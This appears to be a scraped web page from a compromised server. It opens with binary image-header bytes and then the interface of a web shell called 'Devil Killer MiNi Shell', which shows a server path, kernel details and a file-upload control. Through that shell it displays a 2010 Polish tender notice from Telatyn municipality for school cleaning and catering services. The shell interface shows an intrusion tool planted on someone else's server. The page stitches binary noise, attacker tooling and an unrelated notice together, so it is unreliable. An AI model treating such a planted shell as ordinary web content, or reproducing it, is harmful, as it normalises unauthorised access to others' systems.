JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100628/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100628/168681-N-2010.html

<p class="kh_header"><b>Telatyn: 1. Utrzymanie czystości w Gimnazjum w Telatynie w okresie 01.09.2010r. -30.06.2011r.
2. Przygotowanie posiłków oraz eksploatacja kuchni i stołówki w Gimnazjum w
      Telatynie w okresie 01.09.2010r. -30.06.2011r.</b><br>
<b>Numer ogłoszenia: 168681 - 2010; data zamieszczenia: 28.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Telatyn , Telatyn 71, 22-652 Telatyn, woj. lubelskie, tel. 084 6613110, faks 084 6613110.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 1. Utrzymanie czystości w Gimnazjum w Telatynie w okresie 01.09.2010r. -30.06.2011r.
2. Przygotowanie posiłków oraz eksploatacja kuchni i stołówki w Gimnazjum w
      Telatynie w okresie 01.09.2010r. -30.06.2011r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi polegające na:
1.	Utrzymanie czystości w Gimnazjum w Telatynie w okresie 01.09.2010r. -30.06.2011r
     Szczegółowy zakres prac i obowiązków :
1. Sprzątanie codzienne za wyjątkiem dni wolnych od nauki obejmować będzie:
1/ sale szkolne (910 m2) 
2/ toalety / mycie ścian i posadzek/ ( 70 m2)
3/ korytarze, klatki schodowe, schody zewnętrzne i inne pomieszczenia szkolne (475 m2)
4/ teren przylegający / boisko / ( 5000 m2)
2. Mycie okien - 4 razy w roku w terminach uzgodnionych z Zamawiającym.
Wykonawca zobowiązany jest do utrzymania w należytym stanie sanitarno - porządkowym powierzchni poziomych i pionowych z uwzględnieniem iż w salach szkolnych występują wykładziny, parkiet, płytki PCV, glazura i terakota. 
W toaletach występuje terakota lub lastriko: 
str. 2
3. Zakres prac związanych z utrzymaniem porządku przy sprzątaniu obejmuje :
1/ odkurzanie
2/ czyszczenie powierzchni podłogowych
3/ czyszczenie i wycieranie kurzu z powierzchni ławek, biurek, szaf, szafek, parapetów, pulpitów, listew ściennych, drzwi itp. 
4/ porządkowanie i dezynfekcja toalet, czyszczenie glazury łazienkowej, armatury luster wiszących, zabezpieczenie toalet w papier toaletowy i mydło w płynie oraz środki 
dezynfekujące i zapachowe. Po zakończeniu usługi Wykonawca  maluje we własnym zakresie łazienki, ubikacje i pomieszczenia gospodarcze.
5/ opróżnianie i czyszczenie koszy na śmieci
6/ mycie otworów okiennych / szyb i ram okiennych od wewnątrz i z zewnątrz /
polegające na tym, że technika mycia powinna być dostosowana do rodzaju okien
7/ okresowe / w terminach ustalonych przez Dyrektora Gimnazjum / pranie firan, zasłon nie mniej niż dwa razy w roku
8/ sprzątanie boiska oraz terenu przyległego do szkoły i koszenie trawy(dotyczy także terenu pomiędzy ogrodzeniem Gimnazjum a drogą publiczną ) - wysokość porostu traw nie może przekraczać  - 10 cm . 
9/ podlewanie kwiatów w klasach i na korytarzach  - w tym, w okresie ferii , wakacji i dbałość o ogródek przyszkolny,
10/ zabezpieczyć wykonanie usługi ( obecność pracownika ) w trakcie zajęć pozalekcyjnych ,dyskotek i uroczystości szkolnych - w terminach uzgodnionych z Dyrektorem Gimnazjum w tym, w dni wolne od pracy
4. Sprzątanie należy prowadzić w godzinach od 7.00 do 17.00 lub innych godzinach po uzgodnieniu z Zamawiającym i zatwierdzeniu przez Zamawiającego.
5. Należy zabezpieczyć co najmniej jednego pracownika zobowiązanego do stałego przebywania na terenie szkoły w godzinach jej pracy (wymagane  uzgodnienie z Dyrektorem Gimnazjum), do którego obowiązków należeć będzie:
a) bieżące sprzątanie obiektu
b) dzwonienie na lekcje i przerwy 
c) odśnieżanie , posypywanie ciągów komunikacyjnych środkami  zapobiegającymi oblodzeniu (dotyczy również chodnika przy drodze publicznej przyległego do terenu Gimnazjum)
d) nadzór nad szatniami
e)pilnowanie aby osoby postronne nie przebywały na terenie szkoły.
f) otwiera i zamyka budynek Gimnazjum oraz ponosi pełną odpowiedzialność za jego zabezpieczenie podczas zajęć lekcyjnych i podczas wykonywania usługi.
6. Czynności porządkowe należy wykonywać po zajęciach lekcyjnych.
7. Środki czystości i sprzęt niezbędny do wykonania usługi zabezpiecza wykonawca
8. Wykonuje drobne naprawy sprzętu szkolnego np. zamki, spłuczki itp. - zlecone przez Dyrektora Gimnazjum.
9. Z własnych środków wyposaża szkołę w środki czyszczące, piorące, dezynfekujące, ścierki, ręczniki, ręczniki jednorazowe, papier toaletowy, mydło w płynie oraz ubrania ochronne dla siebie i swoich pracowników. 



str.3
10. Wykonywanie niezbędnych prac porządkowych w szkole i jej otoczeniu w okresie ferii zimowych i letnich (podlewanie kwiatów , koszenie trawy) w 2010r do 31.07.2011r oraz prac mających na celu przygotowanie obiektu do rozpoczęcia roku szkolnego w 2010/11r oraz innych prac zleconych przez Dyrektora Gimnazjum a dotyczących utrzymania czystości w Gimnazjum i otoczeniu .
 
2. Przygotowanie posiłków oraz eksploatacja kuchni i stołówki w SP i Gimnazjum Telatyn w okresie 01.09.2010r. -30.06.2011r. 
   Szczegółowy zakres prac i obowiązków : 
1.Przygotowywanie i podawanie posiłków oraz obsługa i eksploatacja kuchni wraz ze stołówką codziennie za wyjątkiem dni wolnych od nauki obejmować będzie:
1/ zbieranie pieniędzy od dzieci na zakup produktów żywnościowych na potrzeby stołówki z zastosowaniem przepisów ustawy o zamówieniach publicznych (Dz.U. z 2004 Nr 19 poz. 177 
z późniejszymi zmianami) .  Do przygotowywania posiłków celem obniżenia ich ceny używać należy produktów przekazanych przez rodziców. Zbiórkę produktów żywnościowych (ziemniaki, warzywa, owoce) organizować w porozumieniu z Dyrektorem Gimnazjum i przedstawicielem Rady Rodziców
2/ opracowywanie tygodniowych jadłospisów z wyliczeniem wartości kalorycznych i podaniem gramatury posiłków . Uwaga! Odrębnie dla Gimnazjum i Szkoły Podstawowej
3/ gotowanie posiłków zgodnie z tygodniowymi jadłospisami - zatwierdzonymi przez Dyrektora Gimnazjum oraz przedstawiciela Rady Rodziców.
4/ podawanie posiłków w godzinach i ilości ustalonej przez Dyrektora Gimnazjum
5/ sprzątanie i mycie naczyń
6/ utrzymywanie w należytym stanie technicznym i sanitarnym pomieszczenia kuchni, stołówki oraz wyposażenia
2.	Posiłki przygotowywać zgodnie z obowiązującymi przepisami sanitarno - epidemiologicznymi i standardami żywieniowymi dotyczącymi dzieci i młodzieży szkolnej
3.	Przy zakupie produktów żywnościowych stosować przepisy ustawy o zamówieniach publicznych.
4.	. Każdego miesiąca rozliczać koszty posiłków - informacje przedkładać Dyrektorowi Gimnazjum, Radzie Rodziców . Dyrektor Gimnazjum, przedstawiciele Rady Rodziców oraz osoby upoważnione przez Dyrektora Gimnazjum mają prawo kontroli dokumentacji Wykonawcy w zakresie wykonywanej usługi, zaś w przypadku nie udostępnienia dokumentacji lub niezgodnego jej prowadzenia z niniejszą SIWZ z Wykonawcą zostanie rozwiązana umowa o usługę z jego winy.
5.	. Wykonawca zobowiązany jest zapewnić do obsługi osoby posiadające stosowne i aktualne badania lekarskie. Ponosi całkowitą odpowiedzialność za stan sanitarny kuchni i stołówki, w tym realizuje postanowienia i decyzje dotyczące funkcjonowania i obsługi kuchni oraz stołówki szkolnej. Zapewnić uczniom terminowe wydawanie posiłków.
6.	. Zakres prac obejmuje ponadto następujące czynności:
1)Porządkowanie i dezynfekcja urządzeń kuchennych i naczyń
2)Mycie otworów okiennych w pomieszczeniach kuchni, stołówki oraz pomieszczeń
    pomocniczych.
            3) Dbałość o czystość ścian i powierzchni podłogowych - w miarę potrzeby wykonuje 
                 malowanie ścian.
str.4
7.	Zamawiający zabezpiecza dostawy energii elektrycznej do urządzeń zainstalowanych w  kuchni na własny koszt.
8.	Wykonawca:
1)Odpowiada za należyty stan urządzeń kuchennych i naczyń. Remonty bieżące i uzupełnianie stanu naczyń wykonuje na bieżąco i we własnym zakresie
2)W przypadku awarii urządzeń technicznych powierzonych wykonawcy spowodowanych jego winą - remontu dokonuje we własnym zakresie
3) Wykonawca na własny koszt wyposaża kuchnię w niezbędne urządzenia techniczne dostosowane do własnych źródeł zasilania.
4)Wykonawca z własnych środków zakupuje gaz .
5) Wykonawca ponosi pełną odpowiedzialność za przestrzeganie przepisów BHP i przeciw pożarowych - odpowiada przed jednostkami kontrolującymi. 
6)Wykonawca z własnych środków wyposaża kuchnię i stołówkę w środki czyszczące, piorące, dezynfekujące, ścierki, ręczniki oraz ubrania ochronne dla pracujących osób
7)W przypadku przygotowania posiłków dla osób nie będących uczniami klas 0 - VI Szkoły Podstawowej lub I-III Gimnazjum pobiera za nie pełną odpłatność z uwzględnieniem kosztów lokalowych, amortyzacji, energii i obsługi. ?  pobranej kwoty za posiłki z tytułu eksploatacji kuchni, ceny energii,  należy przekazać na konto Urzędu Gminy w rozliczeniu miesięcznym w terminie 7 dni. 
8)Wykonawca zobowiązany jest w uzgodnieniu z Dyrektorem Gimnazjum obsłużyć uroczystości i zajęcia szkolne w dniach wolnych od pracy w tym, w okresie ferii oraz wykonywać inne prace zlecone przez Dyrektora Gimnazjum a związane z prowadzeniem i obsługą kuchni oraz stołówki.
9)W przypadku zmniejszenia liczby osób korzystających z posiłków w okresie obowiązywania umowy kwota ustalona w przetargu zostanie pomniejszona o odpowiedni %.
Liczba dzieci korzystająca ze stołówki ( dwa dania) - ok. 350 uczniów.
Dopuszcza się  możliwość składania ofert częściowych :
     Zadanie pierwsze - Utrzymanie czystości. CPV:   74760000-4
      Zadanie drugie     - Przygotowanie posiłków oraz eksploatacja kuchni i stołówki w  Gimnazjum  w Telatynie. CPV: 55523100-3.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 74.76.00.00-4, 55.52.31.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymaga się wpłaty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2)	wykazu wykonanych w okresie ostatnich trzech lat usług, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  z podaniem ich wartości, przedmiotu, daty wykonania i odbioru, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie( wykazać minimum jedną usługę tego typu )zał. nr 4</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> :http://telatyngm.ovh.org<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gimnazjum w Telatynie
33-600  Telatyn..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.07.2010 godzina 10:00, miejsce: Urzad Gminy w Telatynie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Utrzymanie czystości w Gimnazjum w Telatynie w okresie 01.09.2010r. -30.06.2011r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Utrzymanie czystości w Gimnazjum w Telatynie w okresie 01.09.2010r. -30.06.2011r
     Szczegółowy zakres prac i obowiązków :
1. Sprzątanie codzienne za wyjątkiem dni wolnych od nauki obejmować będzie:
1/ sale szkolne (910 m2) 
2/ toalety / mycie ścian i posadzek/ ( 70 m2)
3/ korytarze, klatki schodowe, schody zewnętrzne i inne pomieszczenia szkolne (475 m2)
4/ teren przylegający / boisko / ( 5000 m2)
2. Mycie okien - 4 razy w roku w terminach uzgodnionych z Zamawiającym.
Wykonawca zobowiązany jest do utrzymania w należytym stanie sanitarno - porządkowym powierzchni poziomych i pionowych z uwzględnieniem iż w salach szkolnych występują wykładziny, parkiet, płytki PCV, glazura i terakota. 
W toaletach występuje terakota lub lastriko: 
str. 2
3. Zakres prac związanych z utrzymaniem porządku przy sprzątaniu obejmuje :
1/ odkurzanie
2/ czyszczenie powierzchni podłogowych
3/ czyszczenie i wycieranie kurzu z powierzchni ławek, biurek, szaf, szafek, parapetów, pulpitów, listew ściennych, drzwi itp. 
4/ porządkowanie i dezynfekcja toalet, czyszczenie glazury łazienkowej, armatury luster wiszących, zabezpieczenie toalet w papier toaletowy i mydło w płynie oraz środki 
dezynfekujące i zapachowe. Po zakończeniu usługi Wykonawca  maluje we własnym zakresie łazienki, ubikacje i pomieszczenia gospodarcze.
5/ opróżnianie i czyszczenie koszy na śmieci
6/ mycie otworów okiennych / szyb i ram okiennych od wewnątrz i z zewnątrz /
polegające na tym, że technika mycia powinna być dostosowana do rodzaju okien
7/ okresowe / w terminach ustalonych przez Dyrektora Gimnazjum / pranie firan, zasłon nie mniej niż dwa razy w roku
8/ sprzątanie boiska oraz terenu przyległego do szkoły i koszenie trawy(dotyczy także terenu pomiędzy ogrodzeniem Gimnazjum a drogą publiczną ) - wysokość porostu traw nie może przekraczać  - 10 cm . 
9/ podlewanie kwiatów w klasach i na korytarzach  - w tym, w okresie ferii , wakacji i dbałość o ogródek przyszkolny,
10/ zabezpieczyć wykonanie usługi ( obecność pracownika ) w trakcie zajęć pozalekcyjnych ,dyskotek i uroczystości szkolnych - w terminach uzgodnionych z Dyrektorem Gimnazjum w tym, w dni wolne od pracy
4. Sprzątanie należy prowadzić w godzinach od 7.00 do 17.00 lub innych godzinach po uzgodnieniu z Zamawiającym i zatwierdzeniu przez Zamawiającego.
5. Należy zabezpieczyć co najmniej jednego pracownika zobowiązanego do stałego przebywania na terenie szkoły w godzinach jej pracy (wymagane  uzgodnienie z Dyrektorem Gimnazjum), do którego obowiązków należeć będzie:
a) bieżące sprzątanie obiektu
b) dzwonienie na lekcje i przerwy 
c) odśnieżanie , posypywanie ciągów komunikacyjnych środkami  zapobiegającymi oblodzeniu (dotyczy również chodnika przy drodze publicznej przyległego do terenu Gimnazjum)
d) nadzór nad szatniami
e)pilnowanie aby osoby postronne nie przebywały na terenie szkoły.
f) otwiera i zamyka budynek Gimnazjum oraz ponosi pełną odpowiedzialność za jego zabezpieczenie podczas zajęć lekcyjnych i podczas wykonywania usługi.
6. Czynności porządkowe należy wykonywać po zajęciach lekcyjnych.
7. Środki czystości i sprzęt niezbędny do wykonania usługi zabezpiecza wykonawca
8. Wykonuje drobne naprawy sprzętu szkolnego np. zamki, spłuczki itp. - zlecone przez Dyrektora Gimnazjum.
9. Z własnych środków wyposaża szkołę w środki czyszczące, piorące, dezynfekujące, ścierki, ręczniki, ręczniki jednorazowe, papier toaletowy, mydło w płynie oraz ubrania ochronne dla siebie i swoich pracowników. 



str.3
10. Wykonywanie niezbędnych prac porządkowych w szkole i jej otoczeniu w okresie ferii zimowych i letnich (podlewanie kwiatów , koszenie trawy) w 2010r do 31.07.2011r oraz prac mających na celu przygotowanie obiektu do rozpoczęcia roku szkolnego w 2010/11r oraz innych prac zleconych przez Dyrektora Gimnazjum a dotyczących utrzymania czystości w Gimnazjum i otoczeniu .:   74760000-4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.76.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przygotowanie posiłków oraz eksploatacja kuchni i stołówki w Gimnazjum w
      Telatynie w okresie 01.09.2010r. -30.06.2011r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> . Przygotowanie posiłków oraz eksploatacja kuchni i stołówki w SP i Gimnazjum Telatyn w okresie 01.09.2010r. -30.06.2011r. 
   Szczegółowy zakres prac i obowiązków : 
1.Przygotowywanie i podawanie posiłków oraz obsługa i eksploatacja kuchni wraz ze stołówką codziennie za wyjątkiem dni wolnych od nauki obejmować będzie:
1/ zbieranie pieniędzy od dzieci na zakup produktów żywnościowych na potrzeby stołówki z zastosowaniem przepisów ustawy o zamówieniach publicznych (Dz.U. z 2004 Nr 19 poz. 177 
z późniejszymi zmianami) .  Do przygotowywania posiłków celem obniżenia ich ceny używać należy produktów przekazanych przez rodziców. Zbiórkę produktów żywnościowych (ziemniaki, warzywa, owoce) organizować w porozumieniu z Dyrektorem Gimnazjum i przedstawicielem Rady Rodziców
2/ opracowywanie tygodniowych jadłospisów z wyliczeniem wartości kalorycznych i podaniem gramatury posiłków . Uwaga! Odrębnie dla Gimnazjum i Szkoły Podstawowej
